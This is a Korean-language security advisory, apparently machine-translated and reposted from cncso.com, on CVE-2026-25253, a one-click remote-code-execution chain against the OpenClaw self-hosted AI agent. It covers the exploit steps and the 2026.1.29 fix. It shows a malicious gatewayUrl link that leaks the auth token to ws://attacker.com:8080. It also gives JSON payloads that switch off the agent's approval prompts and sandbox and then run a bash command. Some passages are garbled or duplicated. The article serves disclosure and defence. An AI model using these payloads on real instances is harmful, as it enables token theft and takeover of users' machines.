1. OpenClaw 소개
오픈클로(이전의 클로봇, 몰트봇)는 오픈 소스 자율형일체 포함개인 비서 프로젝트는 2025년 11월에 처음 출시되었습니다. 이 프로젝트는 대규모 언어 모델(LLM)의 기능을 실제 시스템 운영 권한과 긴밀하게 통합하는 자체 호스팅이 가능하고 로컬에서 실행되는 AI 에이전트를 사용자에게 제공하는 것을 목표로 합니다. 사용자 데이터를 클라우드에 저장하는 SaaS 어시스턴트와 달리 OpenClaw는 사용자 자신의 장치(예: 노트북, 홈 서버 또는 VPS)에 배포되므로 데이터의 개인정보 보호 및 제어가 보장됩니다. .
이 프로젝트는 강력한 기능과 개방형 아키텍처로 인해 개발자 커뮤니티에서 빠르게 인기를 얻고 있으며, 깃허브 저장소는 단기간에 149,000개 이상의 별표를 획득했습니다.OpenClaw는 iMessage, WhatsApp, Slack 등과 같은 다양한 인스턴트 메시징 앱과 통합할 수 있으며 파일 읽기 및 쓰기, 셸 명령 실행과 같은 높은 시스템 권한을 부여하여 다음과 같은 작업을 수행할 수 있습니다. 사용자가 지정한 복잡한 작업을 완료하기 위해 하지만 이러한 '갓 모드' 권한 설계는 심각한 보안 취약점의 원인이 되기도 합니다. 그러나 이러한 '갓 모드' 권한 설계는 심각한 보안 취약성의 원인이 되기도 합니다.
2. OpenClaw 취약점 원리
CVE-2026-25253CVSS 3.1 점수 8.8(고위험)인 이 취약점은 토큰 공개, 사이트 간 웹소켓 하이재킹, 샌드박스 탈출과 관련된 일련의 로직 결함에 뿌리를 두고 있습니다. 링크를 클릭하면 사용자 상호 작용 없이 전체 공격이 트리거될 수 있습니다.
2.1 핵심 취약점 체인
이 취약점은 아래 표와 같이 세 가지 주요 링크가 함께 구성되어 있습니다:
|
환형 링 |
문서/모듈 |
결함 설명 |
|
토큰 유출 |
app-settings.ts |
제어 인터페이스는 URL 쿼리 매개 변수를 맹목적으로 신뢰하고 유지합니다.게이트웨이Url. |
앱 수명 주기 |
존재하다게이트웨이Url설정 직후 새 게이트웨이에 대한 연결이 자동으로 트리거됩니다. |
|
gateway.ts |
웹소켓 연결을 설정할 때 자동으로 높은 권한의인증 토큰전달게이트웨이Url. |
|
|
사이트 간 웹소켓 하이재킹(CSWSH) |
웹소켓 서버 |
에 대한 연결 요청에 응답하지 않았습니다.원산지헤더를 사용하여 임의의 소스로부터의 연결을 허용합니다. |
|
샌드박스 탈출 |
API |
공격자는 탈취한operator.admin그리고운영자.승인권한을 설정하고 API 호출을 통해 보안 보호 메커니즘을 비활성화할 수 있습니다. |
첫째, 사용자가 악성 코드가 포함된 파일을 클릭할 경우게이트웨이Url매개변수에 대한 링크(예 http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080 ), OpenClaw의 프런트엔드 애플리케이션은 인증 없이 공격자의 서버 주소를 새 게이트웨이 주소로 저장합니다. 그런 다음 애플리케이션은 즉시 이 새 주소로 웹소켓 연결을 설정하려고 시도하고 로컬에 저장되고 인증된인증 토큰. 서버에서 수신 중인 공격자는 이 토큰을 쉽게 가로챌 수 있습니다. .
둘째, 브라우저는 웹소켓 연결에 대해 동일 출처 정책(SOP)을 적용하지 않기 때문에 OpenClaw의 웹소켓 서버가 인증에 실패합니다.원산지요청 헤더를 사용하여 사이트 간 웹소켓 하이재킹이 발생할 수 있습니다. 즉, 공격자는 악성 웹 사이트에서 JavaScript를 사용하여 피해자의 브라우저가 다음에서 실행되는 웹 서버로 "스프링보드" 역할을 하도록 허용할 수 있습니다.localhost웹소켓 연결은 오픈클로 인스턴스의 .
마지막으로, 공격자는 탈취한 상승된 권한 토큰을 사용하여 API 호출을 통해 OpenClaw의 기본 제공 보안 메커니즘을 끌 수 있습니다. 이러한 메커니즘은 원래 위험한 명령을 실행하기 전에 사용자 확인 메시지를 표시하고 컨테이너화된 샌드박스에서 코드를 실행하는 등의 프롬프트 인젝션으로 인한 AI 모델의 악의적인 동작을 방어하는 데 사용되었습니다. 공격자는 이러한 보호 기능을 쉽게 비활성화하여 호스트에서 직접 임의의 명령을 실행할 수 있는 기능을 확보할 수 있습니다. .
그림 1: OpenClaw 아키텍처 및 CVE-2026-25253 취약점 경로
그림 2: OpenClaw 원클릭 RCE 활용 체인
3. OpenClaw POC/EXP
보안 연구원 마브 레빈이 공개한 세부 정보에 따르면, 피해자가 악성 웹 페이지를 방문한 후 몇 밀리초 안에 전체 '원클릭 RCE' 공격 익스플로잇 체인이 완료될 수 있습니다.
그림 3: OpenClaw CVE-2026-25253 공격 흐름
3.1 공격의 흐름
1.클릭 유도피해자가 공격자가 제어하는 웹 페이지를 방문하도록 유도합니다(예 공격자닷컴).
2.토큰 도난페이지의 자바스크립트가 백그라운드에서 피해자의 OpenClaw 인스턴스를 가리키는 URL과 함께 공격자의 서버를 가리키는 URL을 엽니다.게이트웨이Url매개변수를 설정하면인증 토큰를 공격자에게 보냅니다.
3.로컬 연결 및 권한페이지의 또 다른 자바스크립트는 훔친 토큰을 사용하여 피해자의 로컬 OpenClaw 웹소켓 서비스(기본적으로 ws://localhost:18789).
4.보안 비활성화공격 스크립트가 API 요청을 전송하고 사용자 확인 및 샌드박스 모드를 비활성화합니다.
사용자 확인 페이로드 사용 안 함:
{"method": "exec.approvals.set","params": { "기본값": { "보안": "full", "ask": "off" } }}
페이로드의 샌드박싱 비활성화통해config.patch요청tools.exec.host로 설정게이트웨이.
5.코드 실행마지막으로 공격 스크립트는node.invoke요청을 호출하여system.run명령을 사용하여 피해 호스트에서 임의의 코드를 실행합니다.
RCE 페이로드 예시:
{"type": "req","id": “4”,"method": "node.invoke","params": {"nodeId": "main","command": "system.run","params": {"cmd": "bash -c 'echo hacked > /tmp/hacked'" } }}
그림 4: 사이트 간 웹소켓 하이재킹(CSWSH) 메커니즘 상세 정보
4. 취약점 개선 프로그램
OpenClaw 팀은 신속하게 대응하여 수정 사항을 발표했습니다! 2026.1.29. 주요 수정 사항은 결함이 있는 자동 연결의 사슬을 끊고 사용자 상호 작용의 보안을 강화하는 것입니다.
"이 패치는 게이트웨이 URL 확인 모달을 추가하여 프롬프트 없이 자동 연결되는 동작을 제거합니다."
구체적인 수정 사항은 다음과 같습니다:
확인 대화 상자 추가: 언제게이트웨이Url매개변수를 사용하여 게이트웨이 주소를 변경하면 사용자에게 변경 사항을 수동으로 확인할지 묻는 확인 대화 상자가 나타납니다.
자동 연결 제거사용자의 명시적인 허가 없이 새 게이트웨이에 자동으로 연결하는 동작을 완전히 제거했습니다.
관계자는 모든 사용자에게 즉시 다음 버전으로 업그레이드할 것을 권장합니다. v2026.1.29 이상으로 변경해야 합니다. 또한 사용자가 자신의 인증 토큰이 유출되었다고 의심되는 경우 즉시 .
5. 참조
[1] CSO. 클로봇 엔터프라이즈 인텔리전트 바디 애플리케이션 보안 강화 가이드.” 2026-01-31.
[2] "몰트봇 데이터와 키를 훔치는 원클릭 RCE(CVE-2026-25253)". 2026-02-01.
[3] 국가 취약점 데이터베이스. "CVE-2026-25253."
[4] 깃허브. "오픈클로/오픈클로에서 구체 간 잘못된 리소스 전송." ghsa-g8p2-7wf7-98mq.
최고 보안 책임자의 원본 기사, 복제할 경우 출처 표시: https://www.cncso.com/kr/openclaw-one-click-remote-code-execution.html
